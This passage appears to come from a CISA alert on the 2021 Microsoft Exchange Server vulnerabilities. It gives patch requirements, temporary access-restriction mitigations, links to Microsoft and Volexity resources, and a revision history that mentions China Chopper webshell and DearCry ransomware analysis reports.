(Updated March 4, 2021): CISA is aware of threat actors using open source tools to search for vulnerable Microsoft Exchange Servers. This type of attack is scriptable, allowing attackers to exploit the vulnerabilities at scale through automated mechanisms. CISA advises all entities to patch as soon as possible to avoid being compromised.

(Updated March 4, 2021): From Microsoft's patch release, the security updates are available for the following Exchange Server versions:
- Exchange Server 2010 (update requires SP 3 or any SP 3 RU; this is a defense-in-depth update)
- Exchange Server 2013 (update requires CU 23)
- Exchange Server 2016 (update requires CU 19 or CU 18)
- Exchange Server 2019 (update requires CU 8 or CU 7)

(Updated March 4, 2021): If you are running an older CU than the patch will accept, you must first upgrade to at least the required CU stated above and then apply the patch.

(Updated March 4, 2021): All patches must be applied using administrator privileges.

(Updated March 5, 2021): If patching is not an immediate option, CISA strongly recommends following the alternative mitigations found in Microsoft's blog on Exchange Server Vulnerabilities Mitigations. These options should only be used as a temporary measure, not a replacement for patching. Additionally, there are other mitigation options available. CISA recommends limiting or blocking external access to internet-facing Exchange Servers via the following:
- Restrict untrusted connections to port 443, or set up a VPN to separate the Exchange Server from external access. Note that this will not prevent an adversary from exploiting the vulnerability if the attacker is already inside your network.
- Block external access to on-premises Exchange:
  - Restrict external access to the OWA URL: /owa/.
  - Restrict external access to the Exchange Admin Center (EAC), also known as the Exchange Control Panel (ECP), URL: /ecp/.
- (Updated March 4, 2021): Disconnect vulnerable Exchange servers from the internet until a patch can be applied.

CISA would like to thank Microsoft and Volexity for their contributions to this Alert.

Resources

- (Updated April 14, 2021) Microsoft's April 2021 Security Update, which mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.
- (Updated March 12, 2021) The Check My OWA tool, for checking whether a system has been affected. Disclaimer: this tool does not check against an exhaustive list of compromised domains. It is meant for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information and cannot assure its accuracy or completeness; therefore, entities should not rely solely on this information to justify foregoing CISA's recommendations for action described on this webpage.
- Microsoft Advisory: https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/
- Microsoft Security Blog - Hafnium targeting Exchange Servers: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
- Volexity Blog: https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- Microsoft's blog on Exchange Server Vulnerabilities Mitigations: https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/

References
[1] Eric Zimmerman: KAPE Documentation
- Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities
- Supplemental Direction V1 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities
- Supplemental Direction V2 to Emergency Directive 21-02: Mitigate Microsoft Exchange On-Premises Product Vulnerabilities

Revisions
- March 3, 2021: Initial Version
- March 4, 2021: Updated Mitigations and Technical Details sections
- March 5, 2021: Updated Mitigations Guidance from Microsoft
- March 10, 2021: Updated TTP Section
- March 12, 2021: Updated Resources Section
- March 12, 2021: Added information on DearCry Ransomware
- March 13, 2021: Added seven China Chopper Webshell MARs
- March 14, 2021: Updated information on DearCry Ransomware
- March 16, 2021: Added information on EOMT tool
- March 25, 2021: Added two China Chopper Webshell MARs
- March 25, 2021: Updated MARs to include YARA Rules
- March 31, 2021: Added links to ED 21-02 and ED 21-02 Supplemental Direction
- April 12, 2021: Added one China Chopper Webshell MAR and one DearCry Ransomware MAR
- April 13, 2021: Added links to Microsoft's April 2021 Security Update and ED 21-02 Supplemental Direction V2
- April 14, 2021: Added Exchange Server 2013 to the list of on-premises Exchange Servers affected by the vulnerabilities disclosed on April 13, 2021.
- July 19, 2021: Added attribution note

News (DARKReading, The Hacker News, Threatpost)